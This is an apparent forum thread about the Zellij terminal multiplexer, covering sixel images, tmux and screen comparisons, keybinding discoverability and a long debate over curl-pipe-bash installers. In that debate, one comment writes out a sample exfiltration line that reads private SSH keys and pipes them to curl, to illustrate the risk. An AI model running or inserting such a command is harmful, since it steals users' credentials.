They just merged sixel support (the oldest images in terminals protocol).
Which shows that they are going places gnu screen and tmux have never wanted to.
In zellij you can scroll through and flip between different terminals that show sixel images, it's quite neat, knowing that such leaps are being made.
Meanwhile as a longtime GNU Screen user, I've been using workarounds to pass through hyperlink markup (ls --hyperlink) and thinking about what I could do if there was sixel or other image protocol support - Zellij already supports hyperlinks just fine, and now images so it is very promising.
You've got my attention with the sixel support. I use screen quite heavily, but I'm open to switching for something like that.
I think I use screen in an unusual way, I know a few keyboard shortcuts but 99% of the time I use the command line.
If you press Ctrl-A :, you get a command line with tab completion to access all the screen commands. I have no idea what the shortcut is to split a window, because I just use :split. Same with :resize, :focus, :remove, :paste, :title, etc, etc. I'm quite happy with one less application I need to memorize bindings for, and I'm reluctant to give that up!
Makes sense - I am 71 years old, and when I get really used to software I don't like to change. For example, I am celebrating my 40th anniversary of having paid Common Lisp work. Using Mosh (sometimes) instead of SSH was a worthwhile change though.
Good news that tmux allows to customize bindings, including "leader" key - so I've adjusted my .tmux.conf to have the same bindings as in screen and switching them without enforcing myself (in that rare cases when tmux is not present/cannot be installed on server).
I've been using Zellij on both Linux & Mac for around six months.
It's great! For someone who wants a terminal multiplexer but a) doesn't feel like learning all the idiosyncracies of tmux and b) is OK with adding some configs in toml — it's ideal.
The downsides are that it's not perfectly stable — maybe once a month I get a panic — and some terminal cobwebs aren't encapsulated — e.g. it's not possible to use "[" in key mappings.
let's skip the part on idio-something of `tmux`, but the very much selling point of screen and tmux, among multiplexing, as support of detached state and being able to reattach later on.
Zellij seems to be targeted on local machine of end user (desktop, laptop) vs being used on server through ssh. Nothing bad about that of course, just this product is not for me.
That's true, if they wanted to keep the look of the design, they should have used something like CSS or SVG with searchable text rather than a raw image.
I wish there was a CLI editor with a zellij-like UI. I'm a nano guy, but I think the menu bar could be made much richer.
Discoverability is #1 on my list of any new app. I don't want to spend weeks learning commands or referring to the manual to use functionality that I know is there. Over time, recurring patterns I'll memorize the shortcuts for. The rarer stuff I can go through the menu, explore my options and get tentative result using my own data.
Helix(https://helix-editor.com/) and Kakoune(https://kakoune.org/) both have a keybindings that are discoverable through their UI. Helix has this small pop up that shows you the keys that you can chord and what command they perform. And kakoune has a Clippy like thing.
You could also use a thing like a neovim distribution that has which-key support.
I'd only recommend Helix (or kakoune) to someone willing to spend time learning keybindings. -- I do put helix in the same bucket as zellij as "exciting upcoming tools which are nice out of the box".
which-key (from emacs) is excellent, and I wish more programs adopted the idiom. I'd say in Helix's case, it's good for helping discover the long tail of features you don't use often. It'd be a struggle to use without learning some set of navigation/editing.
> I love that it's more discoverable, with the keybindings displayed more readily.
Do you miss it in Tmux? Not that I remember all the hotkeys, but most 10 of them used 99% of the time for sure, for the rest just `<leader>+?`, `Ctrl+a ?` for my config - shows your current settings.
No, but I already spent time to learn tmux. (That, and I have the opinion that I'd rather keep any window fullscreen, and be able to quickly switch between windows; so I prefer having sessions of panes, rather than splitting panes).
I still think it's a neat feature for keyboard-driven interfaces to have. -- e.g. I'd rather poke around lazygit than tig.
User friendly shortcuts ? It uses Ctrl/Shift + functions keys all around... Not user friendly for me, on my laptop I would have either to hit Ctrl/Shift + Fn + plus one of the top row keys, or go into the BIOS, reverse the the top row so that I can press directly a function key but give up on the possibility of hitting volume/brightness up/down... I am sure it works for some though.
Please do not pipe scripts downloaded through curl into bash. Use a package manager. That way the downloaded binary can be verified against a checksum and/or GPG signing.
Please lend your own time and energy to generate packages for bespoke distributions and package managers. You will need: deb, rpm, apk, AppImage, casks, tars, and likely more. Make sure to spend your time submitting your package to maintainers for each repository/registry for each distribution and each distro version. Don't forget to test each and every permutation!
Is all that too hard? No problem. Stand up your own repository for each distribution mechanism and instruct the user to run a bunch of random curl and key handling commands to bind their machine to this new software supply chain attack channel. At least this 'potentially malicious' code is being checksumed/gpg verified!
-- the point --
'curl | sh' is inherently no different from a trust perspective then issuing a package installation command or installing a new repository source for a package manager. Each user makes the value judgement if they trust the software or not. Your free to run the 'curl' part and inspect the script, or contribute packages to the byzantine linux/unix ecosystem if it boils your blood so hard.
It is inherently different, because it's been proven that you can detect the use of curl|bash Serverside. This makes it possible to serve the malicious payload only to people which do that.
But I'd agree that the hurdle to get your package into system repositories likely ain't with it. People are free to compile it themselves, download it manually or whatever floats their boats if they don't want to use the quick and easy install script... Which they can audit by saving it to the filesystem before executing the file.
"It is inherently different, because it's been proven that you can detect the use of curl|bash Serverside"
Malicious people do malicious things? I worry that we conflate trust with validity. Some package systems do it better than others, but in principle you trust that for example, a maintainer of a package repository is not serving you bad checksums and malicious content. After all these systems get their checksums/keys on-first-use, so you still need to make the trust judgement. And they could still change the responses based on your ip, user agent, or other metadata they have access to when you interact with the system.
To boil it down to my gripe, the comments about checksums/gpg signing being the reason to never 'curl | sh' make no sense until you can clear the trust argument first, which no one does. And once you do clear the trust argument, and conclude the source is trustworthy, we can have a more technical debate on the distribution mechanism itself and what makes sense from that perspective.
edit: forgot to add, 'curl | sh' is also a trust on-first-use scenario just like with package ecosystems.
I think I wasn't clear enough so I'll try to rephrase it:
A compromise from a malicious curl|bash script is basically impossible to detect.
All other avenues at least give you the potential ability to figure out how you were compromised after the fact.
With curl|bash there is no trail and you can never find out which commands were actually excecuted, because it's possible to detect the |bash on the server that's providing the script.
Thanks for the clarification I see now what your getting to. I agree having proper packages makes sense at some point in a project's maturity, as you have more infrastructure, checks, and gates to ensure that what you requested is 'valid', and the system produces enough logs/data to compare to other systems to detect drift/compromise. I tend to see if a project gets popular enough, with enough eyeballs/contributors, official packages tend to become inevitable.
Since we've passed the trust gate up to this point for discussion purposes, I still wonder if there is a better model for young projects. Its not just we have multiple package formats, its the per distro/version matrix that tends to bite small developers and projects on time commitment. I would like to see something better than 'curl | sh' that is practical and portable across the unix-y ecosystem. Perhaps a third-party checksum db that caches valid script hashes ala golang sumdb or similar. Seems ripe for improvement.
> because it's been proven that you can detect the use of curl|bash Serverside.
Sure, but what you're missing is that this argument would also strike down package managers. For example, you could similarly fingerprint the difference in behaviors for apt-get vs normal http utilities and only serve malicious packages to people grabbing via apt (likely someone trying to run the code) vs downloading in a browser or via curl/wget (most likely an auditor). This is trivial to do and of course individual packages as well as entire package delivery mechanisms have been compromised.
Please don't contribute worthless and irrelevant comments like this. As you doubtless well know, piping from curl into bash is something that a large subset of respected programmers think is reasonable, and another rather tedious subset do not. For example, the entire Rust community clearly has a consensus that it's reasonable: https://rustup.rs/ As does homebrew https://brew.sh/ and pyenv https://github.com/pyenv/pyenv-installer#install to name whatever came to my mind in 30s thought.
Since the debate has such large numbers on both sides, your individual opinion on it is neither interesting nor germane.
Why do you think your opinion is more valuable than that to which you reply?
For what it's worth, I can rattle off many more project names at random in 30s, and odds are they'll all have installation methods that aren't curl-pipe-shell, there are just so many more of them.
Please read what I wrote more carefully: I wasn't giving an opinion (other than the word "tedious"). I was pointing out the fact that there are large numbers of experienced software engineers on both sides of this argument, and hence it isn't an argument that can be settled, or even helpfully contributed to, by individuals giving their opinions. It's got to the point where it's more like politics or religion or something.
I for one think that this individual opinion has value under this post as a PSA to people who might not otherwise give the command a second thought, regardless of the conclusion they take away.
"a bunch of folks do something insecure" does not speak argument.
The argument is that it is insecure. Most easily because I can inject, "cat ~/.ssh/*_rsa | curl ..." and get your company ssh keys. There's no reason rust, brew and all the rest can't provide a Download page with a checksum. They choose not to, like this project chose not to, because it doesn't look as sexy.
Sure you can, but there's always going to be trust somewhere. I trust that the curl | bash examples I see are from reputable sources, and I trust their infra as much as someone else's to be safe (https protects MITM attacks). NixOS is a cool example of complete package transparency with their binary cache, if your expressions don't evaluate the same as theirs you'll build from source.
But really, curl | bash isn't the end of the world.
If they do it against a github url they also have the security of github behind you, because you can't differentiate on user agent there, which seems to be the commonly argued pitfall. Or other ways to detect you're not a browser, on a hosted platform you have someone else's security team behind your back.
If someone has pulled off a sophisticated enough attack to intercept your http curl of the script and inject a malicious version, why can't they also intercept your brower http requests for the download page and inject different html that gives a good hash/checksum of the malicious script?
Going even further, what is stopping a malicious attack on the package source itself--like someone gaining control of the package source and committing a malicious version (as NPM, pypi and other registries have seen)?
The point is, "use your package manager" is not any better in the grand scheme of things than blindly curling and executing a script. Neither option is perfectly secure.
No, the concern is not your computer is compromised. Yours is a low-value target, sorry.
It's their http server, or a machine that feeds that http server, which is a good target for a compromise. Injecting a little bit of malicious code that steals something, or installs a fileless piece of malware, would bring massive benefits to the perpetrator, even if the exploit is short-lived.
That shell script should be a zip (gzip, xz) file, with a sha256 hash of it published on a different, separately hosted resource.
Maybe we should provide an utility that just does that in one command. It could even be a shell script...
Realistically a poisoned ARP or DNS attack that redirects your machine's traffic to the attacker's server, both for the download and the download page, is something to be concerned about. This only requires someone to have access to your local network, not to your machine. It could be as innocent as working at a coffee shop from their wifi network and an attacker being on it too...
It could, but I can trust that no individual stepped in the middle of that process.
I trust Rust to not put such a thing in their binary. I do not trust an arbitrary man in the middle, and it's trivial to modify a shell script.
Without a checksum, I can't ensure the binary im piping through the shell is the binary they posted and built. Anyone can step in, modify a few lines, and get access to a large part of my system. The barrier to entry to add such capability to arbitrary binaries is outrageously high.
Install scripts are usually hosted on GitHub/etc and changes are clearly tracked. Compiled binaries are untracked and do not offer the same guarantees. I would trust the script more than a binary that could’ve been modified anywhere along the build process.
Not everyone uses Linux, and not every package can be audited by repo devs. It’s simply not scalable.
Trusting it because other people trust it for no apparent reason does not seem like a very compelling argument. For all I know, the Rust and homebrew communities know squat about how to securely deliver binaries.
I wish I could upvote da39a3ee's comment 100 more times. I hate condescending know it all people, and da39a3ee stated this way more eloquently then I would have.
Do you mean for the original comment complaining about the script?
> Please don't complain about tangential annoyances—things like article or website formats, name collisions, or back-button breakage. They're too common to be interesting.
> Avoid unrelated controversies, generic tangents, and internet tropes.
> Please don't post shallow dismissals, especially of other people's work.
> Please don't pick the most provocative thing in an article or post to complain about in the thread. Find something interesting to respond to instead.
This actually doesn't protect you the way you think it does. Using a simple check of the user agent which makes the request, an innocuous file may be served to browser requests, while an infected file may be served to cURL requests.
I love Zellij - have been using it for the last eight months. However, I wish it had a real programming language for configuration (since a program like this can be so versatile) instead of TOML.
Not to be dismissive, but I have no idea why I should want to install this. I actually just spent a few hours setting up a tmux configuration yesterday, so I feel like I'm in the target audience for this, but...
I can configure panels with YAML, it looks like. Why would I want to change my resizable panes for a set of static ones? It supports arbitrary plugins, is says. But can't I just run any program in tux, so what is the point? The screenshots seem to mostly show how loud and colorful the chrome is, which seems distracting. And then the roadmap seems to be the only feature list, does that mean the software is actually "batteries-will-eventually-be-included"?
Hey, Zellij dev here. I'll try to answer your questions:
- regarding layouts/panes: the panes you configure in the layouts are still resizable a runtime. It just saves you the initial setup. In Zellij you also have a generic non-directional "do what I want" resize, btw.
- regarding plugins: the plugin system is indeed very much a work in progress, mostly because we're an OSS volunteer project and the person in charge of it had to AFK for a while. That being said, I think it's not very difficult to imagine how plugins will be different from normal apps? Think about interaction with panes/layouts, easy distribution, interaction with the terminal assets themselves (imagine custom expandable folds depending on content, notifications depending on content, etc.) and more along those lines.
> regarding layouts/panes: the panes you configure in the layouts are still resizable a runtime. It just saves you the initial setup.
I might use a "save current layout as a template" command, I guess. But I don't think I'd ever bother to learn the custom configuration format for building these myself. If you already have such a command, I'd suggest highlighting that on the site instead of a screenshot of YAML.
> imagine custom expandable folds depending on content, notifications depending on content
OK, this seems like it might be interesting to play with. Is there any "killer plugin" for it yet?
I haven't tried Zellij, but it looks interesting. This is a great feature, and I think incorporating it into the base software reflects good UX priorities.
Multiplexers are useful when logging to a remote server. You can open a bunch of things without separate ssh session for each and you avoid issues with breaking connections cancelling your long time jobs (got me a couple of times when migrating data).
I also use iTerm2 on macOS, with tmux. Here are the main reasons why I do that:
- I can create window splits running multiple shell sessions in each pane, and then "zoom" in to an individual pane to focus on what I'm doing in that shell session.
- I can organize my work into named sessions, with multiple windows within each session, and panes within each window, and navigate between these using the keyboard.
- I can persist that session/window/pane structure across machine reboots (tmux-resurrect). The result is that I always have the same set of tmux shell sessions running, corresponding to the different projects that I work on.
- The same keybindings for session/window/pane management work whether I'm on MacOS or on a remote linux machine running tmux.
But I'm not a very advanced tmux user and there's a lot more I could do. If you look through the tmux feature set it will give you an idea of what you can do beyond what you can do with iTerm2. iTerm2 does have its own "tmux integration mode" but that's never quite appealed to me: I use tmux specifically because I want the tmux style of window splits etc, and because I want the familiar keybindings to be the same when I'm on a linux machine. So placing tmux behind the iTerm2 UI isn't what I'm personally looking for. I think! Or maybe I've misunderstood the iTerm2 feature.
The interface is very discoverable, unlike screen or tmux. You can start using it productively even before reading any documentation. The keybindings feel like a cross between vim (modal) bindings and CUA bindings.
One thing that is a bit weird still is that the displayed keybindings doesn't reflect your configuration, so if you use an alternative config you'll see the wrong bindings for some thing all the time.
I assume Neovim users don't need to care about this thanks to in-built terminal and ability to split, resize and switch between them using standard vim key bindings.
I'm the original Zellij creator. I am and have long been a vim user.
I created this tool originally for people like us. It has lots and lots of extra features and functionality (eg. opening the current pane scrollback inside your default editor in-place).
> opening the current pane scrollback inside your default editor in-place
Wow, that was my favorite feature in dvtm. I'll definitely check it out because while I mostly just use terminal buffers in NeoVim I always get so annoyed that moving the cursor is only possible letter by letter with arrow keys, which is ironic because every bash terminal supports basic inline Vim navigation.
Little comment about the website: I think it would be better to show the content of the About page (or a summary) on the start page instead of just telling people to install a program they don't know anything about. "Terminal workspace with batteries included" can mean almost anything.
But for the Neovim users (including myself), this is handy if they would like to use other applications besides neovim while keeping their neovim session open.
It uses the (n)vim remote API with tmux to maintain a global (n)vim session and redirects files opened via `vmux` back to the global session and switches to the window in tmux that session is visible in.
Hints:
- use `pipx` [2] to install `vmux` to make it available globally so you don't need to mess around with virtual environments.
- just `alias nvim=vmux`, and use `command nvim` if you need the real thing.
- I set the following in my profile file:
export VMUX_EDITOR="nvim"
export VMUX_GLOBAL="true"
alias nvim=vmux
I say this as a vim user, but it reminds me of what nano is compared to vim. With zellij, you can jump in blind and learn how it works. Compared to tmux, which is great, but like vim, requires more upfront learning.
And the configuration is awesome. I’ve defined workspaces that look like a sophisticated IDE with little effort. It always seemed to be more effort doing the same in tmux.
Serious Q: Has a serious emacs user checked this out? It looks exciting, but I’m a full time, long time, emacs -nw multi-buffer M-xshell user. Am I going to be disappointed bcs either it’s not going to let me run emacs on its sub windows, or it will have unresolveable key binding incompatibilities?
Hey, Zellij dev here. You should have no issue running emacs inside a Zellij pane. There might be some keybindings collisions, but you can always configure your way out of it if you like.
In general the problem of colliding keybindings is a hard one, and one we plan to address in the near future as we chip away at some technical debt that stands in our way.
As a serious emacs user, this looks like a stripped down version of emacs. There's no reason to use this if you're already using emacs. Its UI even looks like emacs, with the modeline and minibuffer.
I had similar thoughts when seeing that it uses Web Assembly to provide plugins. It they rewrite the core functionality with that and add an editor then they've basically reinvented emacs (though with less flexibility because the plugin code is compiled). As an emacs user I find the plugin sandboxing idea interesting because security is basically missing from emacs packages. You just have to trust or review what you're installing.
Terminal support in emacs isn't super great so there's definitely room for improvement there. Maybe there's even room for Zillij and emacs to integrate via plugins. That could be quite interesting. I still use emacs and tmux side by side without any integration.
Which shows that they are going places gnu screen and tmux have never wanted to.
In zellij you can scroll through and flip between different terminals that show sixel images, it's quite neat, knowing that such leaps are being made.
Meanwhile as a longtime GNU Screen user, I've been using workarounds to pass through hyperlink markup (ls --hyperlink) and thinking about what I could do if there was sixel or other image protocol support - Zellij already supports hyperlinks just fine, and now images so it is very promising.